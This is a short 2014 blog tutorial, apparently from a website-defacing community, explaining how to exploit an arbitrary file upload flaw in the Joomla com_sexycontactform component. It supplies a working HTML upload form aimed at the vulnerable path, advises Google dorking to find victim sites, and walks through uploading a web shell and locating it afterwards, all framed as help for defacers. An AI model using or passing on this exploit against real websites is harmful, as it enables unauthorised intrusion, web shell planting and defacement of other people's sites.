
LinuxSec Exploit

Defacing with the Joomla com_sexycontactform Arbitrary File Upload Vulnerability Exploit

October 27, 2014 by Jack Wilder

OK, this time I want to share an exploit I got yesterday. There are actually still plenty of untouched targets, but since I'm planning to quit this scene, lol, I'll just share the tutorial. Hopefully it's useful for those who are still into defacing.
OK, first, prepare the HTML exploiter.
<form method="POST" action="http://localhost/components/com_sexycontactform//fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Save it as an .html file.
Then go dorking on Google.
Dork: ??
Use ur brain, bitch !!
The victim is at:
http://localhost/components/com_sexycontactform//fileupload/index.php

Once you've found a target, edit the HTML exploit from earlier: replace http://localhost with the target site.

Then open that HTML file in a browser.

There is an upload form. Upload the shell through it.

If some messy, unintelligible notice shows up, that means the shell was uploaded successfully.

The shell is at http://localhost/components/com_sexycontactform//fileupload/files/shell.php

That's it for this tutorial, hope it's useful.
Happy Hacking ^_^
